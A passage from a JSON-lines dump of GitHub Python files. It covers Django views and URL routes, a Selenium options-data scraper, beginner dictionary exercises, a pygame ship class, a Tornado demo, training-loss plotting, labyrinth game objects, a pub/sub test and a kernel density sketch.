of lit pixels = {}.\".format(len(D)))","repo_name":"shavak/advent_of_code","sub_path":"2021/Day_20/day_20.py","file_name":"day_20.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70030407160","text":"from crispy_forms.helper import FormHelper\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.db import models, transaction\nfrom django.http import HttpResponseRedirect\nfrom django.views.generic import detail, edit\n\n\nclass ModelFormWithInlinesView(\n edit.SingleObjectTemplateResponseMixin, edit.ModelFormMixin, edit.ProcessFormView\n):\n template_name_suffix = \"_form\"\n inlines = {}\n\n def get_inline(self, prefix, cls):\n kwargs = {\n \"prefix\": prefix,\n \"instance\": self.object,\n }\n\n if self.request.method in (\"POST\", \"PUT\"):\n kwargs.update(\n {\"data\": self.request.POST, \"files\": self.request.FILES,}\n )\n\n return cls(**kwargs)\n\n def get_inlines(self):\n return {\n f\"{key}_formset\": self.get_inline(key, cls)\n for key, cls in self.inlines.items()\n }\n\n def get_formset_helper(self):\n helper = FormHelper()\n helper.form_tag = False\n helper.disable_csrf = True\n helper.use_custom_control = False\n helper.template = \"bootstrap4/table_inline_formset.html\"\n return helper\n\n def get_context_data(self, **kwargs):\n kwargs.update(\n {\"formset_helper\": self.get_formset_helper(), \"inlines\": self.get_inlines()}\n )\n return super().get_context_data(**kwargs)\n\n @transaction.atomic\n def form_valid(self, form, inlines={}):\n response = super().form_valid(form)\n\n for inline in inlines.values():\n inline.instance = self.object\n inline.save()\n\n return response\n\n def form_invalid(self, form, inlines={}):\n \"\"\"If the form is invalid, render the invalid form and formsets.\"\"\"\n return self.render_to_response(self.get_context_data(form=form, **inlines,))\n\n def post(self, request, *args, **kwargs):\n \"\"\"\n Handle POST requests: instantiate the form and formset instances with the passed\n POST variables and then check if it's valid.\n \"\"\"\n form = self.get_form()\n inlines = self.get_inlines()\n if form.is_valid() and all(inline.is_valid() for inline in inlines.values()):\n return self.form_valid(form, inlines)\n else:\n return self.form_invalid(form, inlines)\n\n\nclass DuplicateView(detail.SingleObjectTemplateResponseMixin, detail.BaseDetailView):\n \"\"\"Provide the ability to duplicate objects.\"\"\"\n\n template_name_suffix = \"_confirm_duplicate\"\n success_url = None\n\n def clone_relations(self, target):\n source = self.get_object()\n\n for rel in source._meta.get_fields():\n if rel.many_to_many and rel.concrete:\n ThroughModel = rel.remote_field.through\n field_name = rel.m2m_field_name()\n filter = {field_name: source.pk}\n for obj in ThroughModel.objects.filter(**filter).all():\n obj.pk = None\n setattr(obj, field_name, target)\n obj.save(force_insert=True)\n\n @transaction.atomic\n def duplicate(self, request, *args, **kwargs):\n \"\"\"\n Call the duplicate() method on the fetched object and then redirect to the\n success URL.\n \"\"\"\n self.object = self.get_object()\n\n self.object.pk = None\n self.object.save(force_insert=True)\n\n self.clone_relations(self.object)\n\n success_url = self.get_success_url()\n\n return HttpResponseRedirect(success_url)\n\n def post(self, request, *args, **kwargs):\n return self.duplicate(request, *args, **kwargs)\n\n def get_success_url(self):\n \"\"\"Return the URL to redirect to after processing a valid form.\"\"\"\n if self.success_url:\n url = self.success_url.format(**self.object.__dict__)\n else:\n try:\n url = self.object.get_absolute_url()\n except AttributeError:\n raise ImproperlyConfigured(\n \"No URL to redirect to. Either provide a url or define\"\n \" a get_absolute_url method on the Model.\"\n )\n return url\n\n\nclass MixinObjectPageTitle:\n def get_context_data(self, **kwargs):\n if hasattr(self, \"object\"):\n kwargs[\"page_title\"] = str(self.object)\n\n return super().get_context_data(**kwargs)\n","repo_name":"cmulders/eefbakt-recipes","sub_path":"utils/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"560777089","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\nfrom clinician import views\n\nrouter = DefaultRouter()\n\nclinician_viewset = views.ClinicianViewset.as_view({'get': 'list', 'post': 'create'})\n\navailable_slots_list = views.ClinicianAvailabilityViewset.as_view({'get': 'list', 'post': 'create'})\navailable_slot_details = views.ClinicianAvailabilityViewset.as_view({'get': 'retrieve'})\n\nbook_clinician_availability = views.BookClinicianAvailabilityViewset.as_view({'post': 'create', 'get': 'list'})\n\n\nurlpatterns = [\n path(\"\", include(router.urls)),\n path(r\"clinicians/\", clinician_viewset),\n path(r\"clinicians/<str:clinician_id>/available-slots/\", available_slots_list, name=\"available_slots_list\"),\n path(r\"clinicians/<str:clinician_id>/available-slots/<str:availability_id>/\", available_slot_details, name=\"available_slot_details\"),\n path(r\"clinicians/<str:clinician_id>/bookings/\", book_clinician_availability, name=\"book_clinician_availability\"),\n]","repo_name":"suvhotta/clinician-booking-app","sub_path":"clinician/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41235094314","text":"orang = {\n\t'nama': 'Linus Torvald',\n\t'tahun lahir': 1969,\n\t'warga negara': 'Finlandia'\n}\n\nfor kunci in orang:\n\tprint(\"{}: {}\".format(kunci, orang[kunci]))\n\n\nframework = {\n\t'nama': 'Django',\n\t'bahasa': 'Python',\n\t'tahun lahir': 2005,\n\t'versi': '1.9.6'\n}\nprint(\"\\n\\n\")\nfor f in framework:\n\tprint(\"{}: {}\".format(f, framework[f]))","repo_name":"codesyariah122/MyPython","sub_path":"looping/for/lat5.py","file_name":"lat5.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"id","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"16838314162","text":"import time\nimport pickle\nimport datetime\nimport pprint\nimport csv\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\n\n# from sheet import work\n# driver = webdriver.Chrome()\n\n\ndef setup_login():\n driver.wait = WebDriverWait(driver, 10)\n driver.get(\"https://opstra.definedge.com\")\n # # get cookie\n #\n # with open('cookie.txt', 'wb') as fp:\n # pickle.dump(driver.get_cookies(), fp)\n with open('cookie.txt', 'rb') as fp:\n loadedCookie = pickle.load(fp)\n for cookie in loadedCookie:\n # print(cookie)\n try:\n cookie['expiry'] = round(cookie['expiry'])\n except:\n pass\n driver.add_cookie(cookie)\n driver.get(\"https://opstra.definedge.com/options-simulator\")\n driver.wait.until(EC.title_contains(\"Options Simulator\"))\n # driver.wait.until(EC.presence_of_element_located(\n # (By.CSS_SELECTOR, \"span.chip__content > a.black--text\")))\n\n\ndef next_week(old_date):\n new_date = old_date + datetime.timedelta(7)\n return new_date\n\n\nmonth_to_int = {\n \"Jan\": 1, \"Feb\": 2, \"Mar\": 3, \"Apr\": 4, \"May\": 5, \"Jun\": 6, \"Jul\": 7, \"Aug\": 8, \"Sep\": 9, \"Oct\": 10, \"Nov\": 11, \"Dec\": 12\n}\nint_to_month = {\n 1: \"Jan\", 2: \"Feb\", 3: \"Mar\", 4: \"Apr\", 5: \"May\", 6: \"Jun\", 7: \"Jul\", 8: \"Aug\", 9: \"Sep\", 10: \"Oct\", 11: \"Nov\", 12: \"Dec\"\n}\n\n\ndef select_date_in_datepicker(current_date):\n # click date input\n driver.wait.until(EC.presence_of_element_located(\n (By.CSS_SELECTOR, \"div.v-menu > div > div > div > div > div> input\"))).click()\n time.sleep(0.5)\n # click month header;\n # click year header;\n for i in range(0, 2):\n driver.find_element_by_css_selector(\n \"div.v-date-picker-header__value > div > button\").click()\n time.sleep(0.5)\n # find and click year\n years = driver.find_elements_by_css_selector(\"ul.v-date-picker-years > li\")\n for i in range(0, len(years)):\n if int(years[i].get_attribute(\"innerHTML\")) == current_date.year:\n # print(current_date.year)\n years[i].click()\n break\n time.sleep(0.5)\n # find and click month\n months = driver.find_element_by_css_selector(\n \"div.v-date-picker-table.v-date-picker-table--month.theme--light > table > tbody\")\n months = months.find_elements_by_class_name(\"v-btn__content\")\n for i in range(0, len(months)):\n if month_to_int[months[i].get_attribute(\"innerHTML\")] == current_date.month:\n months[i].click()\n break\n time.sleep(0.5)\n # find and click day\n days = driver.find_element_by_css_selector(\n \"div.v-date-picker-table.v-date-picker-table--date.theme--light > table > tbody\")\n days = days.find_elements_by_class_name(\"v-btn__content\")\n for i in range(0, len(days)):\n if int(days[i].get_attribute(\"innerHTML\")) == current_date.day:\n days[i].click()\n break\n time.sleep(0.5)\n return\n\n\ndef select_stock(stock_name):\n driver.wait.until(EC.presence_of_element_located(\n (By.CSS_SELECTOR, \"div.layout.fluid.row.wrap.ma-3 > div > div > div.v-input__control\"))).click()\n # collect all stock names\n stocks = driver.wait.until(EC.presence_of_all_elements_located(\n (By.CSS_SELECTOR, \"div.v-select-list.v-card.theme--light > div > div > a > div > div.v-list__tile__title\")))\n # search stocks list\n for i in range(0, len(stocks)):\n if stocks[i].get_attribute(\"innerHTML\") == stock_name:\n stocks[i].click()\n break\n return\n\n\ndef datetime_to_expiry_string(current_date):\n new_day = str(current_date.day) if current_date.day > 9 else (\n \"0\" + str(current_date.day))\n string_date = new_day + \\\n int_to_month[current_date.month].upper() + str(current_date.year)\n return string_date\n\n\ndef select_expiry_date(current_date):\n driver.wait.until(EC.presence_of_all_elements_located(\n (By.CSS_SELECTOR, \"div.layout.fluid.row.wrap.ma-3 > div > div > div.v-input__control\")))[1].click()\n # driver.find_elements_by_css_selector(\n # \"div.layout.fluid.row.wrap.ma-3 > div > div > div.v-input__control\")[1].click()\n # third_div = driver.wait.until(EC.presence_of_element_located(\n # (By.CSS_SELECTOR, \"div.v-menu__content.theme--light.menuable__content__active.v-autocomplete__content > div.v-select-list.v-card.theme--light\"))).find_elements_by_css_selector(\"div\")[2]\n # scroll to show all values\n driver.execute_script(\n 'list = document.querySelector(\"div.v-menu__content.theme--light.menuable__content__active.v-autocomplete__content\"); let oldHeight = 0; while (oldHeight != list.scrollHeight) {oldHeight = list.scrollHeight; list.scrollTo(0, list.scrollHeight); }')\n expiry_dates = driver.wait.until(EC.presence_of_element_located(\n (By.CSS_SELECTOR, \"div.v-menu__content.theme--light.menuable__content__active.v-autocomplete__content > div.v-select-list.v-card.theme--light > div\"))).find_elements_by_css_selector(\"div.v-list__tile__title\")\n # expiry_dates = driver.find_elements_by_css_selector(\"div.v-select-list.v-card.theme--light\")[\n # 1].find_elements_by_css_selector(\"div.v-list__tile__title\")\n dest_expiry = datetime_to_expiry_string(current_date)\n print(dest_expiry)\n for i in range(0, len(expiry_dates)):\n print(expiry_dates[i].get_attribute(\"innerHTML\"))\n if expiry_dates[i].get_attribute(\"innerHTML\") == dest_expiry:\n expiry_dates[i].click()\n break\n return\n\n\ndef display_all_rows():\n driver.find_element_by_css_selector(\n \"div.v-datatable__actions__select > div > div\").click()\n rows = driver.find_elements_by_css_selector(\n \"div.v-select-list.v-card.theme--light > div.v-list.theme--light\")[0].find_elements_by_class_name(\"v-list__tile__title\")\n for i in range(0, len(rows)):\n if rows[i].get_attribute(\"innerHTML\") == \"All\":\n rows[i].click()\n return\n\n\ndef fetch_table():\n table_rows = driver.find_elements_by_css_selector(\n \"table.v-datatable.v-table.theme--light > tbody > tr\")\n spot_price = driver.find_element_by_css_selector(\n \"div.layout.fluid.row.wrap.ma-3 > div > span.v-chip.v-chip--label.theme--light.green.lighten-4 > span\").get_attribute(\"innerHTML\").split(\": \")[1].split(\"\\n\")[0]\n datetime_str = driver.find_element_by_css_selector(\n \"div.flex.title.text-xs-center.xs12.md2.mt-2.mr-2\").get_attribute(\"innerHTML\").strip().split()\n table = []\n for i in range(0, len(table_rows)):\n row = []\n table_columns = table_rows[i].find_elements_by_css_selector(\"td\")\n row.append(table_columns[1].get_attribute(\"innerHTML\"))\n row.append(table_columns[2].get_attribute(\"innerHTML\"))\n a = table_columns[3].get_attribute(\"innerHTML\")\n # # with delta sign\n # row.append(a[0:a.find(\"<\")] + a[a.find(\">\")+1:a.rfind(\"<\")])\n # row.append(table_columns[4].get_attribute(\"innerHTML\"))\n # a = table_columns[5].get_attribute(\"innerHTML\")\n # row.append(a[0:a.find(\"<\")] + a[a.find(\">\")+1:a.rfind(\"<\")])\n # without delta sign\n row.append(a[0:a.find(\"<\")])\n row.append(table_columns[4].get_attribute(\"innerHTML\"))\n a = table_columns[5].get_attribute(\"innerHTML\")\n row.append(a[0:a.find(\"<\")])\n row.append(table_columns[6].get_attribute(\"innerHTML\"))\n row.append(table_columns[7].get_attribute(\"innerHTML\"))\n row.append(datetime_str[0])\n row.append(datetime_str[1])\n row.append(spot_price)\n # append date, time, spot price\n table.append(row)\n return table\n\n\n# CallLTP, CallIV, CallDelta, Strikes, PutDelta, PutIV, PutLTP, Date, Time, Spotprice\n\n\ndef save_to_csv(array_2D):\n with open(\"array.csv\", \"a\") as my_csv:\n newarray = csv.writer(my_csv, delimiter=',')\n newarray.writerows(array_2D)\n return\n\n\ndef click_5_min():\n driver.find_element_by_css_selector(\n \"div.layout.row.wrap.justify-space-around.fill-height.hidden-sm-and-down\").find_elements_by_css_selector(\"button\")[4].click()\n return\n\n\ndef get_option_chain():\n driver.find_element_by_css_selector(\n \"div.layout.justify-end > button > div.v-btn__content\").click()\n return\n\n\ndef wait_for_load():\n # driver.find_element_by_css_selector(\n # \"div.vld-overlay.is-active.is-full-page\")\n print(\"waiting....\")\n time.sleep(0.5)\n while driver.wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"div.vld-overlay\"))).get_attribute(\"style\") != \"display: none;\":\n # while driver.wait.until(EC.presence_of_element_located(\n # (By.XPATH, \"/html/body/div/div[21]/main/div/div/div/div/div[2]/div[1]\"))).get_attribute(\"style\") == \"display: none;\":\n # print(\".\")\n continue\n time.sleep(0.5)\n print(\"continue\")\n return\n\n\ndef loop(start_date, end_date):\n current_date = datetime.date.fromisoformat(start_date)\n # compare datepicker's selected date\n # datepicker_date = driver.find_element_by_css_selector(\n # \"div.v-menu > div > div > div > div > div> input\").get_attribute(\"value\").split(\"-\")\n select_stock(\"BANKNIFTY\")\n wait_for_load()\n # while current_date < end_date\n while current_date <= datetime.date.fromisoformat(end_date):\n select_date_in_datepicker(current_date)\n wait_for_load()\n select_expiry_date(current_date)\n wait_for_load()\n for i in range(0, 74):\n # <-------fetch stats-------->\n display_all_rows()\n table = fetch_table()\n # plug in sheet\n work(current_date.isoformat(), table)\n # go next\n try:\n click_5_min()\n get_option_chain()\n wait_for_load()\n except:\n pass\n current_date = next_week(current_date)\n pass\n\n\ndef csv_loop():\n for i in range(0, 74):\n get_option_chain()\n wait_for_load()\n save_to_csv(fetch_table())\n click_5_min()\n\n\n# if __name__ == \"__main__\":\n# start_date = \"2020-03-12\"\n# end_date = \"2020-03-26\"\n# wait_for_load()\n# loop(start_date, end_date)\n","repo_name":"mario8192/opstra-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"74528340281","text":"computers = {\n 'HP' : 20,\n 'DELL' : 50,\n 'MACBOOK' : 12,\n 'ASUS' : 30,\n}\n\n# print('the number of MACBOOK computer is:', computers['MACBOOK'])\n\n# computer_type = input('enter type of computer: ').upper()\n# print('the number of', computer_type, 'computer is: ', computers[computer_type])\n\n# new_computer = input(\"enter new type of computer: \").upper()\n# number = input('enter the number of it: ')\n# computers[new_computer] = number\n# print(computers)\ncomputers['TOSHIBA'] = 50\ncomputers['DELL'] = 10\ncomputers['MACBOOK'] = 2\ncomputers['FUJITSU'] = 15\ncomputers['ALIENWARE'] = 5\nprint(computers)\nsum = 0\nfor k, v in computers.items():\n sum = sum + v\nprint('the total number of computers is', sum, 'computers')\n\nprice = {\n 'HP' : 600,\n 'DELL' : 650,\n 'MACBOOK' : 12000,\n 'ASUS' : 400,\n 'ACER' : 350,\n 'TOSHIBA' : 600,\n 'FUJITSU' : 900,\n 'ALIENWARE' : 1000,\n}\nprint(price)\n# # print(price['ASUS'])\n# comp_price = input('enter a type of computer: ').upper()\n# print('the price of that computer is:', price[comp_price])\n\n# comp = input('enter a type of computer: ').upper()\n# number = int(input('enter the number of computers you wanna buy: '))\n# price_comp = price[comp]*number\n# print('the total price is', price_comp)\n\n# comp = input('eneter a computer type: ').upper()\n# number = int(input('enter the number of computers you wanna buy: '))\n\n#Sep\n# comp_number = input('enter a computer type and the number: ').upper()\n# a = comp_number.split(':')\n# comp = a[0]\n# number = int(a[1])\n# computers[comp] = computers[comp] - number\n# print('the maintain', comp, 'computer is', computers[comp])\n# print(computers)\n\ntotal_price = 0\nfor a,b in zip(computers.values(), price.values()):\n c = a * b\n print(c)\n total_price += c\nprint('the total price is', total_price)","repo_name":"duybui2905/C4T-13","sub_path":"session11/computers.py","file_name":"computers.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14042529914","text":"import pygame\n\nclass Ship():\n def __init__(self,ai_settings,screen):\n \"\"\"initialisation of ship and setting its start position\"\"\"\n self.screen = screen\n self.ai_settings = ai_settings\n\n #load ship image and get rectangle form image\"\"\"\n self.image = pygame.image.load('images/ship.bmp')\n self.rect = self.image.get_rect()\n self.screen_rect = screen.get_rect()\n\n #Start each new ship at the bottom center of screen\n self.rect.centerx = self.screen_rect.centerx\n self.rect.bottom = self.screen_rect.bottom\n self.center = float(self.rect.centerx)\n\n #Movement flag\n self.moving_right = False\n self.moving_left = False\n\n def update(self):\n \"\"\"Update the ship's postition based on the movement flag\"\"\"\n #update ships center value. not the rect.\n if self.moving_right and self.rect.right < self.screen_rect.right:\n self.center += self.ai_settings.ship_speed_factor\n if self.moving_left and self.rect.left > self.screen_rect.left: #0 would also work\n self.center -= self.ai_settings.ship_speed_factor\n\n #update rect object form self.center.\n self.rect.centerx = self.center\n\n def blitme(self):\n \"\"\"Draws the ship at it's current location.\"\"\"\n self.screen.blit(self.image,self.rect)\n\n def center_ship(self):\n \"\"\"Center ship on the screen.\"\"\"\n self.center = self.screen_rect.centerx\n","repo_name":"PurpleRepublic/Python-Aliens-Game","sub_path":"ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35706945182","text":"# 1、Tornado 基本使用\n# 2、html 文件映射\n# 3、模板路径配置 (html)\n# 4、静态文件配置 (js、css、图片等)\n# 5、添加post 接收提交参数\n# 6、向html传递参数\n# 7、使用模板语言\n# 8、模板语言\n# {{}}\n# {% if %} {% endif %}\n# 自定义模板语言'\n# 1. ui_methods\n# 2. ui_modules\n# 9、html 调用 Python 语言\n\n# 10、static_url MD5\n\n\nimport tornado.ioloop\nimport tornado.web\nimport uimethod as mt\nimport uimodule as md\n\nINPUTS_LIST = []\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self, *args, **kwargs):\n # 返回内容\n # self.write(\"Hello World!\")\n self.render('index.html', list=INPUTS_LIST)\n\n def post(self, *args, **kwargs):\n name = self.get_argument(\"name\")\n\n INPUTS_LIST.append(name)\n self.render('index.html', list=INPUTS_LIST)\n\n # self.write(\"哈哈😁\" + name)\n\n# 模板路径配置、静态文件配置\nsettings = {\n \"template_path\" : \"template\",\n \"static_path\" : \"static\",\n 'ui_methods': mt,\n 'ui_modules' : md,\n}\n\n#\n\n\n# 路由映射、模板路径配置\napplication = tornado.web.Application([\n (r\"/index\", MainHandler),\n], **settings)\n\nif __name__ == \"__main__\":\n application.listen(8000)\n tornado.ioloop.IOLoop.instance().start()","repo_name":"Jerrywx/Python_Down","sub_path":"04-Tornado/01-Hello Tornado/03-HelloWorld.py","file_name":"03-HelloWorld.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10215160340","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport json\nimport pdb\nimport sys\nimport seaborn as sns\nimport os\n\ndef get_json_list_data(data):\n '''\n Each list item is a dictionary of two keys 'loss' and 'acc'.\n '''\n assert(type(data) == type([]))\n plt.close('all')\n data_dict = {'acc': [], 'val_acc': [], 'loss': [], 'val_loss': []} \n for d in data:\n for k, v in data_dict.iteritems():\n if d.get(k, None):\n v.append(d[k])\n return data_dict\n\ndef plot_data(data, save_dir):\n if data.get('test_acc') is not None:\n plot_data_3(data, save_dir)\n else:\n plot_data_2(data, save_dir)\n\ndef plot_data_2(data, save_dir):\n '''\n data is a dictionary containing 'loss', 'acc', 'val_acc', 'val_loss'\n '''\n plt.close('all')\n plt.figure(figsize=(20,10))\n print(data.keys())\n\n # summarize history for accuracy\n plt.subplot(2,2,1)\n plt.plot(data['acc'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n # plt.legend(['train', 'test'], loc='upper left')\n plt.legend(['train'], loc='upper left')\n plt.subplot(2,2,2)\n plt.plot(data['val_acc'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['val'], loc='upper left')\n\n # summarize history for loss\n plt.subplot(2, 2, 3)\n plt.plot(data['loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train'], loc='upper left')\n plt.subplot(2, 2, 4)\n plt.plot(data['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['validation'], loc='upper left')\n plt.savefig(save_dir + '/' + 'loss_hist.png')\n plt.show()\n\ndef plot_data_3(data, save_dir):\n plt.close('all')\n plt.figure(figsize=(20,10))\n\n # summarize history for accuracy\n plt.subplot(2,3,1)\n plt.plot(data['acc'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n # plt.legend(['train', 'test'], loc='upper left')\n plt.legend(['train'], loc='upper left')\n plt.subplot(2,3,2)\n plt.plot(data['val_acc'])\n plt.title('Val accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['val'], loc='upper left')\n plt.subplot(2,3,3)\n plt.plot(data['test_acc'])\n plt.title('Test accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['test'], loc='upper left')\n\n # summarize history for loss\n plt.subplot(2, 3, 4)\n plt.plot(data['loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train'], loc='upper left')\n plt.subplot(2, 3, 5)\n plt.plot(data['val_loss'])\n plt.title('Val loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['val'], loc='upper left')\n plt.subplot(2, 3, 6)\n plt.plot(data['test_loss'])\n plt.title('Test loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['test'], loc='upper left')\n plt.savefig(save_dir + '/' + 'loss_acc_hist.png')\n\n plt.show()\n\n\ndef main(json_file, save_dir):\n with open(json_file, 'r') as fp:\n data = json.load(fp)\n if type(data) == type({}):\n plot_data(data, save_dir)\n elif type(data) == type([]):\n plot_data(get_json_list_data(data), save_dir)\n else:\n assert(False)\n\nif __name__ == '__main__':\n assert(len(sys.argv) >= 2)\n json_file = sys.argv[1]\n save_dir = os.path.dirname(json_file)\n main(json_file, save_dir)\n\n","repo_name":"mohitsharma0690/multi_scale_head_gesture","sub_path":"utils/plot_loss_acc.py","file_name":"plot_loss_acc.py","file_ext":"py","file_size_in_byte":3525,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"36025360548","text":"from abc import ABCMeta, abstractmethod\nfrom typing import List\nimport random\n\nfrom game.interfaces.icellobject import ICellObject\nfrom game.implementations.labyrinth.cell import Cell\n\nclass BaseCellObject(ICellObject):\n def __init__(self, id: str):\n self.id = id\n self.cell = None\n\n def placeTo(self, cell: Cell):\n self.cell = cell\n\n def dump(self) -> dict:\n return {\n 'class': type(self).__name__,\n 'id': self.id,\n 'cell': [self.cell.x, self.cell.y]\n }\n\n @classmethod\n def load(cls, data: dict, cells: list):\n tr = cls(data['id'])\n tr.cell = cells[data['cell'][1]][data['cell'][0]]\n return tr\n\n\nclass Treasure(BaseCellObject):\n def activate(self, player, game):\n player.addObject(self)\n\n\nclass Wormhole(BaseCellObject):\n def __init__(self, id: str):\n super().__init__(id)\n self.toId = None\n\n def activate(self, player, game):\n to = game.labyrinth.getObjectById(self.toId)\n\n player.x = to.cell.x\n player.y = to.cell.y\n\n def dump(self) -> dict:\n data = super().dump()\n data['toId'] = self.toId\n return data\n\n @classmethod\n def load(cls, data, cells):\n obj = super().load(data, cells)\n obj.toId = data['toId']\n return obj\n\n\nclass WormholeFactory:\n @staticmethod\n def getRing(count: int) -> List[Wormhole]:\n objects = []\n for i in range(count):\n objects.append(Wormhole(\"W\" + str(i)))\n \n for i in range(count):\n objects[i].toId = objects[(i + 1) % count].id\n\n return objects\n\n\nclass River(BaseCellObject):\n def __init__(self, id: str):\n super().__init__(id)\n self.toId = None\n\n def activate(self, player, game):\n way_len = random.randint(0, 2)\n\n end = self\n for _ in range(way_len):\n if end.toId:\n end = game.labyrinth.getObjectById(end.toId)\n\n player.x = end.cell.x\n player.y = end.cell.y\n\n return way_len\n\n def dump(self) -> dict:\n data = super().dump()\n data['toId'] = self.toId\n return data\n\n @classmethod\n def load(cls, data, cells):\n obj = super().load(data, cells)\n obj.toId = data['toId']\n return obj\n\n\nclass RiverFactory:\n @staticmethod\n def getDirect(count: int) -> List[River]:\n objects = []\n for i in range(count):\n objects.append(River(\"R\" + str(i)))\n \n for i in range(count - 1):\n objects[i].toId = objects[i+1].id\n\n return objects\n\n @staticmethod\n def getWay(lenght: int, cell: Cell, cells: List) -> List[Cell]:\n variants = [[] for _ in range(4)]\n\n for i in range(lenght):\n if cell.y - i >= 0:\n variants[0].append(cells[cell.y - i][cell.x])\n if cell.x - i >= 0:\n variants[1].append(cells[cell.y][cell.x - i])\n if cell.y + i < len(cells):\n variants[2].append(cells[cell.y + i][cell.x])\n if cell.x + i < len(cells[cell.y]):\n variants[3].append(cells[cell.y][cell.x + i])\n\n variants = list(filter(lambda var: len(var) == lenght, variants))\n\n return random.choice(variants)\n","repo_name":"m-rodin/labyrinth_game","sub_path":"game/implementations/labyrinth/objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9548879465","text":"from unittest.mock import Mock\n\nfrom pypubsub.base_publisher_subscriber.publisher import Publisher\n\n\ndef test_publish_should_dispatch_object_in_the_publishers_topic():\n # Given\n mock_topic = Mock()\n publisher = Publisher(mock_topic)\n object_to_send = \"Message\"\n\n # When\n publisher.publish(object_to_send)\n\n # Then\n mock_topic.dispatch.assert_called_once_with(object_to_send)\n","repo_name":"SamyAB/pypubsub","sub_path":"tests/test_base_publisher_subscriber/test_publisher.py","file_name":"test_publisher.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21573483505","text":"# 计算模型\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import norm\nfrom sklearn.neighbors import KernelDensity\n\narrayFilePath = \"../data/test3.txt\"\nvector = np.loadtxt(arrayFilePath, dtype=np.float32)\n\nprint(vector)\n\n# 归一化sigmod\ndef sigmoid(X,useStatus):\n if useStatus:\n return 1.0 / (1 + np.exp(-float(X)))\n else:\n return float(X)\n\n# 归一化 0~1的范围\n\ndef MaxMinNormalization(x,Max,Min):\n x = (x - Min) / (Max - Min)\n return x\n\n\nX_row=np.size(vector,0) #计算 X 一行元素的个数\nX_col=np.size(vector,1) #计算 X 一列元素的个数\n\n\n# 计算出每两个高维向量之间的距离\ndis = []\ndis2 = []\nfor i in range(X_row):\n vec1 = vector[i]\n for j in range(i+1,X_row):\n vec2 = vector[j]\n dis_c = np.sqrt(np.sum(np.square(vec1 - vec2)))\n dis_cs = sigmoid(dis_c,1)\n dis.append([dis_c])\n dis2.append(dis_cs)\n\nmaxValue = np.max(dis)\nminValue = np.min(dis)\n\n# dis3 = map(MaxMinNormalization(),dis,maxValue,minValue)\ndis3 = MaxMinNormalization(dis,maxValue,minValue)\n# print(dis)\nprint(dis3)\nprint(len(dis))\n# 标准差\nstdValue = np.std(dis3)\n\nprint(stdValue)\n\n\n# Plot all available kernels\nX_plot = np.linspace(-6, 6, 1000)[:, None]\nX_src = np.zeros((1, 1))\n\nfig, ax = plt.subplots(2, 3, sharex=True, sharey=True)\nfig.subplots_adjust(left=0.05, right=0.95, hspace=0.05, wspace=0.05)\n\n\ndef format_func(x, loc):\n if x == 0:\n return '0'\n elif x == 1:\n return 'h'\n elif x == -1:\n return '-h'\n else:\n return '%ih' % x\n\nfor i, kernel in enumerate(['gaussian', 'tophat', 'epanechnikov',\n 'exponential', 'linear', 'cosine']):\n axi = ax.ravel()[i]\n log_dens = KernelDensity(kernel=kernel).fit(X_src).score_samples(X_plot)\n axi.fill(X_plot[:, 0], np.exp(log_dens), '-k', fc='#AAAAFF')\n axi.text(-2.6, 0.95, kernel)\n\n axi.xaxis.set_major_formatter(plt.FuncFormatter(format_func))\n axi.xaxis.set_major_locator(plt.MultipleLocator(1))\n axi.yaxis.set_major_locator(plt.NullLocator())\n\n axi.set_ylim(0, 1.05)\n axi.set_xlim(-2.9, 2.9)\n\nax[0, 1].set_title('Available 